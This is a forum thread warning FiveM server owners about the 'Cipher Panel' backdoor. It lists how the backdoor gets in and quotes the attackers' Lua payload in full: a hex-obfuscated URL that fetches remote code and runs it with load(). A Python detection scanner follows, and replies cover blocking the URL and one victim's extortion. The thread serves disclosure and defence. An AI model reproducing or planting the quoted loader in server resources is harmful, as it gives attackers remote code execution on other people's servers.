"Cipher Panel" FiveM Backdoor Update

fendi

Staff member
Administrator
Jun 20, 2021
Miami, Florida
Hello everyone!
We would like to update you on the FiveM Backdoor that has been going around.

This backdoor can be injected via an exploit... The current sources are:
1. Leaked or cracked resources
2. Car or map packs from unknown sources
3. Via runcode when using a really poor rcon_password
4. Exploitable resources such as esx_kashracters, vrp_basic_menu (old version) and any other resource that allows running Lua code server-side without permission checking

These guys are called Cipher; they are a group of French scammers attacking different vulnerable servers for money.
This is what their payload looks like (Lua):
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,    -- [10]: the only entries that matter are this one,
    assert, server, load, Spawn, materials  -- [11] assert and [13] load; the rest are nil padding
}

-- Each entry is one byte written as two hex digits; joined and decoded they spell the panel URL.
local random_char = {
    '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
    '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f'; '72',
    '2e', '70', '68', '70', '3f', '74', '6f', '3d', '30'
}

-- Rebuilds the URL string from the hex table (plain obfuscation, not encryption).
function str_utf8()
    _empt = ''
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub('..', function (cc)
        return string.char(tonumber(cc, 16))
    end))
end

-- Enchanced_Tabs[10] is PerformHttpRequest: fetch the URL, then load() the response body
-- as Lua and run it. The nil check comes after the load call, so it guards nothing.
Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)

It basically does a PerformHttpRequest call (a GET request) to https://cipher-panel.me/_i/r.php?to=0 and loads the output of that request as code.
Their web panel can access any server that has this backdoor installed, and you can't stop it until you remove it.

We are already dealing with this problem.
ChocoHax White searches for these backdoors, removes them, and cleans your server of the malicious code.

Best regards.
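As an added example (not code from the original post, from Cipher, or from ChocoHax), here is a Python scanner that does the defender's side of the analysis above: it decodes hex-string tables like random_char to recover the hidden URL, and flags server scripts that combine PerformHttpRequest with load and an obfuscation trait (a hex table or table-index calls). The sample inputs, indicator names and the resources-directory walk are constructed for illustration.

```python
from __future__ import annotations

import pathlib
import re
import sys

# Constructed sample input: the string table and loader from the Cipher payload
# quoted above, as they would appear inside a resource's server script.
SUSPECT_LUA = r"""
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}
local random_char = {
    '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
    '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f'; '72',
    '2e', '70', '68', '70', '3f', '74', '6f', '3d', '30'
}
Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    s()
end)
"""

# Constructed sample input: an ordinary server-side event handler that must not be flagged.
BENIGN_LUA = r"""
RegisterNetEvent('shop:buy')
AddEventHandler('shop:buy', function(item)
    local price = Config.Prices[item]
    TriggerClientEvent('shop:bought', source, item, price)
end)
"""

# A Lua table literal made only of two-hex-digit string literals, e.g. {'68', '74', ...}.
# Lua accepts ';' as well as ',' between fields, so both separators are allowed.
HEX_TABLE_RE = re.compile(r"\{\s*((?:'[0-9a-fA-F]{2}'\s*[,;]?\s*){8,})\}")
HEX_ITEM_RE = re.compile(r"'([0-9a-fA-F]{2})'")

# Individual traits of the loader; none is malicious alone, the combination is.
INDICATORS = {
    "http_request": re.compile(r"\bPerformHttpRequest\b"),
    "dynamic_code_load": re.compile(r"\b(?:load|loadstring)\b"),
    "indexed_call": re.compile(r"\w+\[\d+\]\s*\("),  # calling a function hidden in a table by position
}


def decode_hex_tables(lua_source: str) -> list[str]:
    """Decode every hex-string table in the source the same way the payload's str_utf8() does."""
    decoded = []
    for match in HEX_TABLE_RE.finditer(lua_source):
        items = HEX_ITEM_RE.findall(match.group(1))
        decoded.append(bytes(int(h, 16) for h in items).decode("utf-8", errors="replace"))
    return decoded


def scan_lua(lua_source: str) -> dict:
    """Return the indicators found, decoded strings/URLs, and a verdict for one Lua source."""
    hits = {name: bool(rx.search(lua_source)) for name, rx in INDICATORS.items()}
    decoded = decode_hex_tables(lua_source)
    hits["hex_string_table"] = bool(decoded)
    urls = [s for s in decoded if re.match(r"https?://", s)]
    # Verdict: fetches remote content AND turns data into code AND hides what it is doing.
    suspicious = (
        hits["http_request"]
        and hits["dynamic_code_load"]
        and (hits["hex_string_table"] or hits["indexed_call"])
    )
    return {"indicators": hits, "decoded_strings": decoded, "urls": urls, "suspicious": suspicious}


def scan_directory(root: str) -> dict[str, dict]:
    """Scan every .lua file below root (e.g. the server's resources folder); return flagged files only."""
    findings = {}
    for path in pathlib.Path(root).rglob("*.lua"):
        result = scan_lua(path.read_text(encoding="utf-8", errors="replace"))
        if result["suspicious"]:
            findings[str(path)] = result
    return findings


if __name__ == "__main__":
    # Usage: python scan_backdoor.py /path/to/resources  (no argument: run on the samples)
    if len(sys.argv) > 1:
        for file, result in scan_directory(sys.argv[1]).items():
            print(f"{file}: {result['urls'] or result['decoded_strings']}")
    else:
        print(scan_lua(SUSPECT_LUA))
        print(scan_lua(BENIGN_LUA))
```

The verdict deliberately requires all three traits together: PerformHttpRequest and load each have legitimate uses in FiveM resources, so flagging either alone would drown a server owner in false positives. Any decoded string that looks like a URL is reported so it can be blocked at the firewall and used to search the rest of the resources folder.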

CounterForce

Inactive
Jul 2, 2021
I think it is wise for people with dedicated servers or VPSs to block this URL in their hosts file (Windows) or firewall (Linux)...
That way, there is no traffic possible to that URL...

CTron

Inactive
Jun 28, 2021
Wow, that's nice research and information you've got here.
Unfortunately I have been a victim of them and they wanted money from me. They even had a backdoor into our Discord via a bot, a shame. Half of our Discord was deleted and the remainder was all mixed up.
We ignored them and they gave up after a while.

Good to know how to fight these peeps.
Thanks, keep up the good work. (y)